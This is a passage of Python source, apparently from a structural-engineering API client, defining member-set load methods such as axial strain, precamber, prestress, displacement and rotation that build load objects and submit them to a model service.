raise Exception("WARNING: Load parameter array length should be 8 for LOAD_DISTRIBUTION_TAPERED. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_delta_t_1 = load_parameter[0]
clientObject.magnitude_delta_t_2 = load_parameter[1]
clientObject.magnitude_t_c_1 = load_parameter[2]
clientObject.magnitude_t_c_2 = load_parameter[3]
if load_parameter[4] == True:
clientObject.distance_a_is_defined_as_relative = True
clientObject.distance_a_relative = load_parameter[6]
else:
clientObject.distance_a_is_defined_as_relative = False
clientObject.distance_a_absolute = load_parameter[6]
if load_parameter[5] == True:
clientObject.distance_b_is_defined_as_relative = True
clientObject.distance_b_relative = load_parameter[7]
else:
clientObject.distance_b_is_defined_as_relative = False
clientObject.distance_b_absolute = load_parameter[7]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_PARABOLIC. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_delta_t_1 = load_parameter[0]
clientObject.magnitude_delta_t_2 = load_parameter[1]
clientObject.magnitude_delta_t_3 = load_parameter[2]
clientObject.magnitude_t_c_1 = load_parameter[3]
clientObject.magnitude_t_c_2 = load_parameter[4]
clientObject.magnitude_t_c_3 = load_parameter[5]
elif load_distribution.name == "LOAD_DISTRIBUTION_VARYING":
try:
len(load_parameter[0])==4
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = load_parameter[i][2]
mlvlp.magnitude_delta_t = load_parameter[i][3]
mlvlp.magnitude_t_t = load_parameter[i][2]
mlvlp.magnitude_t_b = load_parameter[i][3]
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
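# Illustrative use of TemperatureChange (a sketch only: `msl` is an assumed instance of the
# enclosing member-set-load class, a client model connection must already exist, and all
# numbers are hypothetical). For the uniform case the list follows the implementation
# order [delta_t, t_c]:
#   msl.TemperatureChange(no=2, load_case_no=1, member_sets='1',
#       load_distribution=MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
#       load_parameter=[10, 20])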
def AxialStrain(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_X,
load_parameter = [],
load_over_total_length: bool= False,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_distribution (enum): Load Distribution Enumeration
load_direction (enum): Load Direction Enumeration
load_parameter (list): Load Parameters
load_over_total_length (bool): Load Over Total Length Option
comment (str, optional): Comment
params (dict, optional): Parameters
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
load_parameter = [epsilon]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
load_parameter = [epsilon1, epsilon2, distance_a_relative = False, distance_b_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
load_parameter = [epsilon1, epsilon2, distance_a_relative = False, distance_b_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
load_parameter = [epsilon1, epsilon2, epsilon3]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_AXIAL_STRAIN
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = load_distribution.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
if load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
try:
len(load_parameter)==1
except:
raise Exception("WARNING: Load parameter array length should be 1 for LOAD_DISTRIBUTION_UNIFORM. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TRAPEZOIDAL. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
if type(load_over_total_length) == bool:
pass
else:
raise Exception("WARNING: Type of the load over total length should be bool. Kindly check inputs correctness.")
if load_over_total_length == False:
if load_parameter[2] == True:
clientObject.distance_a_is_defined_as_relative = True
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_is_defined_as_relative = False
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3] == True:
clientObject.distance_b_is_defined_as_relative = True
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_is_defined_as_relative = False
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.load_is_over_total_length = True
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TAPERED. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
if load_parameter[2] == True:
clientObject.distance_a_is_defined_as_relative = True
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_is_defined_as_relative = False
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3] == True:
clientObject.distance_b_is_defined_as_relative = True
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_is_defined_as_relative = False
clientObject.distance_b_absolute = load_parameter[5]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
try:
len(load_parameter)==3
except:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_PARABOLIC. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.magnitude_3 = load_parameter[2]
elif load_distribution.name == "LOAD_DISTRIBUTION_VARYING":
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
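# Sketch of an AxialStrain call with a trapezoidal distribution (instance name `msl` and all
# values are assumptions): the two booleans mark distances a and b as relative, followed by
# the two distances themselves.
#   msl.AxialStrain(no=3, load_case_no=1, member_sets='1',
#       load_distribution=MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL,
#       load_parameter=[0.001, 0.002, True, True, 0.1, 0.9])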
def AxialDisplacement(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_X,
magnitude : float = 0.0,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Set
load_direction (enum): Load Direction Enumeration
magnitude (float): Load Magnitude
comment (str, optional): Comments
params (dict, optional): Parameters
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_AXIAL_DISPLACEMENT
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
clientObject.magnitude = magnitude
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
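# Hypothetical AxialDisplacement call (uniform by construction; instance name and magnitude
# are assumptions, magnitude is given in model units):
#   msl.AxialDisplacement(no=4, load_case_no=1, member_sets='1',
#       load_direction=MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_X, magnitude=0.005)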
def Precamber(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_Z,
load_parameter = [],
load_over_total_length: bool= False,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_distribution (enum): Load Distribution Enumeration
load_direction (enum): Load Direction Enumeration
load_parameter (list): Load Parameters
load_over_total_length (bool): Load Over Total Length Option
comment (str, optional): Comment
params (dict, optional): Parameters
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
load_parameter = [magnitude]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
load_parameter = [magnitude_1, magnitude_2, distance_a_relative = False, distance_b_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
load_parameter = [magnitude_1, magnitude_2, distance_a_relative = False, distance_b_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
load_parameter = [magnitude_1, magnitude_2, magnitude_3]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_PRECAMBER
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = load_distribution.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
if load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
try:
len(load_parameter)==1
except:
raise Exception("WARNING: Load parameter array length should be 1 for LOAD_DISTRIBUTION_UNIFORM. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TRAPEZOIDAL. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
if type(load_over_total_length) == bool:
pass
else:
raise Exception("WARNING: Type of the load over total length should be bool. Kindly check inputs correctness.")
if load_over_total_length == False:
if load_parameter[2] == True:
clientObject.distance_a_is_defined_as_relative = True
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_is_defined_as_relative = False
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3] == True:
clientObject.distance_b_is_defined_as_relative = True
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_is_defined_as_relative = False
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.load_is_over_total_length = True
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TAPERED. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
if load_parameter[2] == True:
clientObject.distance_a_is_defined_as_relative = True
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_is_defined_as_relative = False
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3] == True:
clientObject.distance_b_is_defined_as_relative = True
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_is_defined_as_relative = False
clientObject.distance_b_absolute = load_parameter[5]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
try:
len(load_parameter)==3
except:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_PARABOLIC. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.magnitude_3 = load_parameter[2]
elif load_distribution.name == "LOAD_DISTRIBUTION_VARYING":
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
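# Precamber with a varying distribution, as a sketch (instance name and values assumed): each
# inner list is [distance, delta_distance, magnitude] and is mapped to one
# varying_load_parameters entry in order.
#   msl.Precamber(no=5, load_case_no=1, member_sets='1',
#       load_distribution=MemberSetLoadDistribution.LOAD_DISTRIBUTION_VARYING,
#       load_parameter=[[1.0, 1.0, 0.01], [2.0, 1.0, 0.02]])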
def InitialPrestress(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_X,
magnitude : float = 0.0,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_direction (enum): Load Direction Enumeration
magnitude (float): Load Magnitude
comment (str, optional): Comment
params (dict, optional): Parameters
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_INITIAL_PRESTRESS
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
clientObject.magnitude = magnitude
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
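# InitialPrestress is always uniform along local x; a minimal hypothetical call
# (instance name and magnitude are assumptions):
#   msl.InitialPrestress(no=6, load_case_no=1, member_sets='1', magnitude=5000)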
def Displacement(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_Z,
load_parameter = [],
load_over_total_length: bool= False,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_distribution (enum): Load Distribution Enumeration
load_direction (enum): Load Direction Enumeration
load_parameter (list): Load Parameters
load_over_total_length (bool): Load Over Total Length Option
comment (str, optional): Comment
params (dict, optional): Parameters
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
load_parameter = [magnitude]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_1:
load_parameter = [magnitude, distance_a_is_defined_as_relative = False, distance_a]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_N:
load_parameter = [magnitude, distance_a_is_defined_as_relative = False, distance_b_is_defined_as_relative = False, distance_a, distance_b]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_2x2:
load_parameter = [magnitude, distance_a_is_defined_as_relative = False, distance_b_is_defined_as_relative = False, distance_c_is_defined_as_relative = False, distance_a, distance_b, distance_c]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_2:
load_parameter = [magnitude_1, magnitude_2, distance_a_is_defined_as_relative = False, distance_b_is_defined_as_relative = False, distance_a, distance_b]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
load_parameter = [magnitude_1, magnitude_2, distance_a_relative = False, distance_b_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
load_parameter = [magnitude_1, magnitude_2, distance_a_relative = False, distance_b_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
load_parameter = [magnitude_1, magnitude_2, magnitude_3]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_DISPLACEMENT
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = load_distribution.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
if load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
try:
len(load_parameter)==1
except:
raise Exception("WARNING: Load parameter array length should be 1 for LOAD_DISTRIBUTION_UNIFORM. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_1:
try:
len(load_parameter)==3
except:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_CONCENTRATED_1. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
clientObject.distance_a_is_defined_as_relative = load_parameter[1]
if load_parameter[1]:
clientObject.distance_a_relative = load_parameter[2]
else:
clientObject.distance_a_absolute = load_parameter[2]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_N:
try:
len(load_parameter)==5
except:
raise Exception("WARNING: Load parameter array length should be 5 for LOAD_DISTRIBUTION_CONCENTRATED_N. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
clientObject.distance_a_is_defined_as_relative = load_parameter[1]
clientObject.distance_b_is_defined_as_relative = load_parameter[2]
if load_parameter[1]:
clientObject.distance_a_relative = load_parameter[3]
else:
clientObject.distance_a_absolute = load_parameter[3]
if load_parameter[2]:
clientObject.distance_b_relative = load_parameter[4]
else:
clientObject.distance_b_absolute = load_parameter[4]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_2x2:
try:
len(load_parameter)==7
except:
raise Exception("WARNING: Load parameter array length should be 7 for LOAD_DISTRIBUTION_CONCENTRATED_2x2. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
clientObject.distance_a_is_defined_as_relative = load_parameter[1]
clientObject.distance_b_is_defined_as_relative = load_parameter[2]
clientObject.distance_c_is_defined_as_relative = load_parameter[3]
if load_parameter[1]:
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[2]:
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_absolute = load_parameter[5]
if load_parameter[3]:
clientObject.distance_c_relative = load_parameter[6]
else:
clientObject.distance_c_absolute = load_parameter[6]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_2:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_CONCENTRATED_2. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.distance_a_is_defined_as_relative = load_parameter[2]
clientObject.distance_b_is_defined_as_relative = load_parameter[3]
if load_parameter[2]:
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3]:
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_absolute = load_parameter[5]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_VARYING:
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TRAPEZOIDAL. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
if type(load_over_total_length) == bool:
pass
else:
raise Exception("WARNING: Type of the load over total length should be bool. Kindly check inputs correctness.")
if load_over_total_length == False:
clientObject.distance_a_is_defined_as_relative = load_parameter[2]
clientObject.distance_b_is_defined_as_relative = load_parameter[3]
if load_parameter[2]:
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3]:
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.load_is_over_total_length = True
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TAPERED. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.distance_a_is_defined_as_relative = load_parameter[2]
clientObject.distance_b_is_defined_as_relative = load_parameter[3]
if load_parameter[2]:
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3]:
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_absolute = load_parameter[5]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
try:
len(load_parameter)==3
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_PARABOLIC. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.magnitude_3 = load_parameter[2]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_VARYING:
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
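# Displacement sketch for LOAD_DISTRIBUTION_CONCENTRATED_2 (instance name and values assumed):
# two magnitudes, two relative/absolute flags, then distances a and b.
#   msl.Displacement(no=7, load_case_no=1, member_sets='1',
#       load_distribution=MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_2,
#       load_parameter=[0.01, 0.02, True, True, 0.25, 0.75])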
def Rotation(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_Z,
load_parameter = [],
load_over_total_length: bool= False,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_distribution (enum): Load Distribution Enumeration
load_direction (enum): Load Direction Enumeration
load_parameter (list): Load Parameters
load_over_total_length (bool): Load Over Total Length
comment (str, optional): Comment
params (dict, optional): Parameters
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
load_parameter = [magnitude]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_1:
load_parameter = [magnitude, distance_a_is_defined_as_relative = False, distance_a]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_N:
load_parameter = [magnitude, distance_a_is_defined_as_relative = False, distance_b_is_defined_as_relative = False, distance_a, distance_b]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_2x2:
load_parameter = [magnitude, distance_a_is_defined_as_relative = False, distance_b_is_defined_as_relative = False, distance_c_is_defined_as_relative = False, distance_a, distance_b, distance_c]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_2:
load_parameter = [magnitude_1, magnitude_2, distance_a_is_defined_as_relative = False, distance_b_is_defined_as_relative = False, distance_a, distance_b]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
load_parameter = [magnitude_1, magnitude_2, distance_a_relative = False, distance_b_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
load_parameter = [magnitude_1, magnitude_2, distance_a_relative = False, distance_b_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
load_parameter = [magnitude_1, magnitude_2, magnitude_3]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
